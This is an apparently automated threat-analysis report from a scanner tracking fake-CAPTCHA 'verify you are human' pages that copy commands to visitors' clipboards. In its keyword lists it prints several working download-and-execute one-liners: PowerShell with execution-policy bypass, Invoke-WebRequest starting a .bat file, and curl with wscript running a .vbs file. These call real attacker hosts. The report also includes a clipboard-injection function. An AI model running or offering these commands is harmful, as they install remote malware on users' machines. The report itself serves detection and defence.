Emerging ClickGrab Campaign: Advanced Analysis of 2026-05-13 Attack Patterns

100 Sites | 22% Detection | 2 PS Downloads

ClickGrab Threat Analysis Report - 2026-05-13

Generated on 2026-05-13 01:58:57

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 22
  • Unique domains encountered: 1,522
  • Total URLs extracted: 7,213
  • PowerShell download attempts: 2
  • Clipboard manipulation instances: 102

Domain Analysis

Most Frequently Encountered Domains

  • bharatnamkeens.com: 405 occurrences
  • www.maheshwaree.com: 320 occurrences
  • twitch.co.com: 318 occurrences
  • 98.70.13.131: 309 occurrences
  • fudgeshop.com.au: 265 occurrences
  • picsera.com: 227 occurrences
  • 18.176.47.246: 218 occurrences
  • adturekorea.co.kr: 214 occurrences
  • scillarodriguez.com: 199 occurrences
  • www.ccera-icar.org: 178 occurrences
  • senevie.com: 174 occurrences
  • devblog.ezeelogin.com: 132 occurrences
  • www.dorper.com.au: 125 occurrences
  • picsera.sirv.com: 121 occurrences
  • 104.199.248.167: 72 occurrences

URL Pattern Analysis

reCAPTCHA imagery

8 occurrences across 5 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha (1 times)
  • https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm (1 times)

Font resources

79 occurrences across 64 distinct URLs

  • https://fonts.gstatic.com (6 times)
  • https://fonts.googleapis.com (5 times)
  • https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0 (2 times)
  • https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620 (2 times)
  • https://use.fontawesome.com/releases/v5.6.3/css/all.css (2 times)
  • ...and 59 more distinct URLs

CDN hosted scripts

6 occurrences across 6 distinct URLs

  • https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 times)
  • https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 times)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)
  • https://framework-gb.cdn.gob.mx/assets/styles/main.css?ver=1.0.0 (1 times)
  • https://framework-gb.cdn.gob.mx/gobmx.js?ver=1.0 (1 times)
  • ...and 1 more distinct URLs

Google resources

118 occurrences across 62 distinct URLs

  • https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png (32 times)
  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (13 times)
  • https://fonts.googleapis.com (5 times)
  • https://www.googletagmanager.com/gtm.js?id= (4 times)
  • https://www.google (3 times)
  • ...and 57 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 528 (112 unique)

Keyword Categories

Social Engineering

46 unique keywords

  • verification-id
  • exec /i https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha";
  • captchaSiteKey
  • Verify You Are Human
  • Captcha
  • captcha-js
  • To better prove you are not a robot
  • Verification Hash
  • I am not a robot
  • ...and 36 more

Obfuscation Indicators

11 unique keywords

  • eval(
  • eval(script)
  • eval("clearTimeout(timeOut"+uid+")")
  • eval("clearTimeout(timeIn"+uid+")")
  • eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)
  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
  • eval(frameContents)
  • ...and 1 more

System Commands

33 unique keywords

  • exec(ua) != null){rv = parseFloat(RegExp.$1);}}else if (n.appName == "Netscape"){rv = 11;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != null){rv = parseFloat(RegExp.$1);}}}return rv;}})(window, document, navigator)
  • POWerShEll
  • wscript
  • const command =
  • Command key on Mac, Win key on other platforms.
  • cmd.exe /c powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;";`
  • Invoke-WebRequest
  • command =powershell -c "Invoke-WebRequest -Uri 'http://95.164.53.214:5554/d.bat' -OutFile \"%temp%\d.bat\" -UseBasicParsing; Start-Process \"%temp%\d.bat\"";
  • CMD
  • ...and 23 more

Verification Text

3 unique keywords

  • Hidden
  • ray id
  • hidden

Technical Terms

19 unique keywords

  • Ray ID
  • WinHttpRequest
  • bitmap
  • XMLHTTP
  • WebClient
  • You will observe
  • responseText
  • .ps1
  • VirtualAlloc
  • odyssey
  • ...and 9 more

Most Frequent Keywords

  • hidden: 45 occurrences
  • robot: 39 occurrences
  • Robot: 29 occurrences
  • failed_to_retrieve: 21 occurrences
  • verification: 20 occurrences
  • CAPTCHA: 18 occurrences
  • Verification: 17 occurrences
  • CAPTCHA Verification: 16 occurrences
  • I am not a robot: 16 occurrences
  • You will observe: 16 occurrences
  • verification-id: 16 occurrences
  • To better prove you are not a robot: 16 occurrences
  • Verification ID: 15 occurrences
  • Ray ID: 14 occurrences
  • Checking if you are human: 14 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';

Group 2: CAPTCHA Verification, CAPTCHA-verificatie-ID, Verification, verification

Group 3: Verification ID, verification-id, verification_data, verification id, Verification Hash, verification_id

Group 4: Ray ID, ray id

Group 5: CAPTCHA, captcha, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, Captcha, captcha-js, CaptchaError

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • DisplayNameTypicalSetupErrorErrorDialog100INSTALLL...
  • ProxyAuthenticationRequiredError
  • bvDynamicImageObserverOptions=
  • exeARPPRODUCTICON30DWUSINTERVALCE8B87EF8EFC67DF99A...
  • CREATEWEBSITEExtracting

Clipboard Manipulation Analysis

Detected clipboard manipulation in 102 instances.

document.execCommand Copy

Found in 42 snippets (41.2% of clipboard code)

Examples:

try { document.execCommand('copy')
document.execCommand("copy")
document.execCommand('copy')

Textarea Manipulation

Found in 45 snippets (44.1% of clipboard code)

Examples:

tListener("click", function () { const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
ng is the safe placeholder above const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy) {
  // Create an off-screen textarea holding the attacker-chosen text
  const tempTextArea = document.createElement("textarea");
  tempTextArea.value = textToCopy;
  document.body.append(tempTextArea);
  // Select it and copy the selection into the system clipboard
  tempTextArea.select();
  document.execCommand("copy");
  // Remove the element so nothing visible remains on the page
  document.body.removeChild(tempTextArea);
}

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.